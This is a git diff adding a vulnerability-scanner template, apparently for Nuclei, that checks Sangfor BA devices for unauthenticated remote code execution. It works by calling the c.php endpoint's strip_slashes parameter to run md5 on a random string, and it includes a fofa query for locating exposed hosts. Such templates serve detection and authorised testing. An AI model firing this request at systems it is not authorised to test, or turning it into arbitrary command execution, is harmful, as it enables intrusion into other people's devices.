diff --git a/vulnerabilities/other/sangfor-ba-rce.yaml b/vulnerabilities/other/sangfor-ba-rce.yaml
new file mode 100644
index 0000000000..cd0740ebf0
--- /dev/null
+++ b/vulnerabilities/other/sangfor-ba-rce.yaml
@@ -0,0 +1,30 @@
+id: sangfor-ba-rce
+
+info:
+  name: Sangfor BA - Remote Code Execution
+  author: ritikchaddha
+  severity: critical
+  description: |
+    A vulnerability in Sangfor product allows remote unauthenticated users to cause the product to execute arbitrary commands.
+  reference:
+    - https://mobile.twitter.com/sec715/status/1406886851072253953
+  metadata:
+    verified: true
+    fofa-query: app="sangfor"
+  tags: rce,sangfor
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/tool/log/c.php?strip_slashes=md5&host={{randstr}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5("{{randstr}}")}}'
+
+      - type: status
+        status:
+          - 200